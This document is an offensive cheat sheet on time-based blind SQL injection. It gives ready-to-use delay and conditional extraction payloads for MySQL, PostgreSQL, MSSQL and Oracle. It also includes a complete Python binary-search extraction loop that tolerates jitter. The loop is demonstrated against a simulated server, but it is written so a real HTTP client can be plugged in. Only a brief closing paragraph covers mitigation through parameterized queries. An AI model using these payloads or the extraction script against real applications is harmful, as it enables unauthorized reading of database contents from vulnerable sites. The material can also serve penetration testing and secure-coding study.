🧠 SQLi - Time-based Blind

Exploitation

Prerequisites:

  • The application must be vulnerable to SQL injection, but the injection produces no usable difference in the response (no error text, no content change), so the only observable channel is how long the server takes to answer.
  • Network latency must be stable enough to accurately measure response delays (high jitter can cause false positives; measure a baseline first and pick a delay well above it).

Time-based SQL injection works in almost any injection context, because it needs no output channel other than the response time.

Think of this as the last resort: each request answers one yes/no question (about 7 requests per character with a binary search over the ASCII range), and every "yes" costs a multi-second delay, so for a large database the extraction can take hours to days.

Attack Vectors

Step 1: Forcing a time delay (the payloads use ` as a placeholder; change it to ' in practice)

-- MySQL / MariaDB
-- MySQL only treats -- as a comment when whitespace follows it, and a trailing space is often stripped from a URL, so send `-- -` (or use `#`).
` OR SLEEP(5)-- -
` UNION SELECT SLEEP(5)-- -   (the UNION must match the original query's column count, e.g. SLEEP(5),NULL,NULL)
 
-- PostgreSQL
-- pg_sleep() returns void, so `OR pg_sleep(5)` is a type error; call it from a FROM clause or in a stacked query.
` OR 1=(SELECT 1 FROM pg_sleep(5))--
`; SELECT pg_sleep(5)--
 
-- MSSQL (Microsoft SQL Server)
-- WAITFOR is a statement, not an expression, so it needs stacked queries (the `;`).
`; WAITFOR DELAY '0:0:5'--
 
-- Oracle
-- DBMS_LOCK.SLEEP needs an EXECUTE grant that application accounts rarely have. DBMS_PIPE.RECEIVE_MESSAGE is usually callable and blocks for the given number of seconds (it returns 1 on timeout, so the condition is also true):
` AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)--
-- Fallback if neither is available: force a heavy query, e.g. a self-join on the all_objects table. Its runtime depends on the server, so calibrate the delay first.
` AND [RANDOM_HEAVY_QUERY]--

Step 2: Extract the data

Each payload asks one yes/no question; a delayed response means "yes". Repeat over every character position (and over the ASCII range, ideally with > comparisons and a binary search rather than testing every value with =) to recover the string.

-- MySQL (Using IF statement)
-- Is the first character of the database name 'm' (ASCII 109)? If yes, sleep 5 seconds.
` OR IF(ASCII(SUBSTRING(database(), 1, 1)) = 109, SLEEP(5), 0)-- -
 
-- PostgreSQL (Using CASE statement; stacked query, because pg_sleep() is not a boolean)
`; SELECT CASE WHEN (ASCII(SUBSTRING(current_database(), 1, 1)) = 109) THEN pg_sleep(5) ELSE pg_sleep(0) END--
-- Same test when stacked queries are not allowed:
` OR 1=(SELECT 1 FROM pg_sleep(CASE WHEN ASCII(SUBSTRING(current_database(), 1, 1)) = 109 THEN 5 ELSE 0 END))--
 
-- MSSQL (Using IF statement; stacked query)
`; IF (ASCII(SUBSTRING((SELECT DB_NAME()), 1, 1)) = 109) WAITFOR DELAY '0:0:5'--
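The full extraction loop behind Step 2, as an added example (not part of the original cheat sheet): a binary search over the ASCII range using MySQL `>` payloads, a baseline measurement and a re-measure step for jitter (the prerequisite above), and a stop condition based on MySQL returning '' (ASCII 0) past the end of the string. The transport is abstracted as `send(payload) -> round-trip seconds`, so the same loop can drive a real HTTP client; here it drives `FakeServer`, a constructed simulation of a vulnerable endpoint whose database name, latency and jitter are made up for the demo.

```python
"""Time-based blind extraction loop. Added example; FakeServer, its secret
"marketplace_db" and its latency figures are constructed for the demo."""
import random
import re
import statistics
from typing import Callable

DELAY = 5.0  # seconds the true branch sleeps, i.e. SLEEP(5) in the payload


def mysql_payload(pos: int, boundary: int, delay: float = DELAY) -> str:
    """Sleep if ASCII(char at pos) > boundary. Using > instead of = allows a
    binary search (7 requests per character instead of up to 95).
    `-- -` rather than `--`: MySQL needs whitespace after the comment marker."""
    return (f"' OR IF(ASCII(SUBSTRING(database(),{pos},1))>{boundary},"
            f"SLEEP({delay:g}),0)-- -")


class TimingOracle:
    """Turns round-trip times into yes/no answers while tolerating jitter."""

    def __init__(self, send: Callable[[str], float], delay: float = DELAY):
        self.send = send
        self.delay = delay
        # Baseline: median RTT of three requests whose condition is always
        # false (no ASCII code exceeds 255, so SLEEP() never fires).
        false_payload = mysql_payload(1, 255, delay)
        self.baseline = statistics.median(send(false_payload) for _ in range(3))
        self.threshold = self.baseline + delay / 2
        self.requests = 3

    def ask(self, pos: int, boundary: int) -> bool:
        rtt = self.send(mysql_payload(pos, boundary, self.delay))
        self.requests += 1
        # Ambiguous zone around the threshold: re-measure twice and take the
        # median so one latency spike cannot flip a bit of the result.
        if abs(rtt - self.threshold) < self.delay / 4:
            more = [self.send(mysql_payload(pos, boundary, self.delay)) for _ in range(2)]
            self.requests += 2
            rtt = statistics.median([rtt] + more)
        return rtt > self.threshold


def extract_char(oracle: TimingOracle, pos: int) -> int:
    """Binary search for the ASCII code (0..127) of the character at pos."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle.ask(pos, mid):   # is code > mid ?
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_string(oracle: TimingOracle, max_len: int = 64) -> str:
    """Read characters until SUBSTRING() runs past the end of the value:
    MySQL returns '' there and ASCII('') is 0."""
    out = []
    for pos in range(1, max_len + 1):
        code = extract_char(oracle, pos)
        if code == 0:
            break
        out.append(chr(code))
    return "".join(out)


class FakeServer:
    """Constructed stand-in for the vulnerable endpoint: evaluates the injected
    comparison against a made-up database name and returns a simulated RTT
    (base latency + jitter + the SLEEP when the condition holds). Nothing sleeps."""
    PAYLOAD_RE = re.compile(r"SUBSTRING\(database\(\),(\d+),1\)\)>(\d+),SLEEP\(([\d.]+)\)")

    def __init__(self, secret: str = "marketplace_db", latency: float = 0.20,
                 jitter: float = 0.15, seed: int = 1):
        self.secret, self.latency, self.jitter = secret, latency, jitter
        self.rng = random.Random(seed)

    def send(self, payload: str) -> float:
        m = self.PAYLOAD_RE.search(payload)
        pos, boundary, delay = int(m.group(1)), int(m.group(2)), float(m.group(3))
        code = ord(self.secret[pos - 1]) if pos <= len(self.secret) else 0  # ASCII('') = 0
        rtt = self.latency + self.rng.uniform(0, self.jitter)
        return rtt + delay if code > boundary else rtt


def demo() -> tuple:
    """Recover database() from the fake server; returns (name, request count)."""
    oracle = TimingOracle(FakeServer().send)
    return extract_string(oracle), oracle.requests


if __name__ == "__main__":
    name, n = demo()
    print(f"database() = {name!r} recovered in {n} requests")
```

With a 5-second delay, the 14-character name plus its terminator costs 105 probes (15 × 7) on top of the 3 baseline requests; at roughly half of them sleeping, that is several minutes for one short string, which is the cost the "last resort" remark above refers to.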

Mitigation

Fix: Use parameterized queries (prepared statements), so user input is bound as a value and never parsed as SQL. This removes the injection itself, which is the only real fix; blocking SLEEP/WAITFOR keywords in a WAF or throttling requests only slows the extraction down.
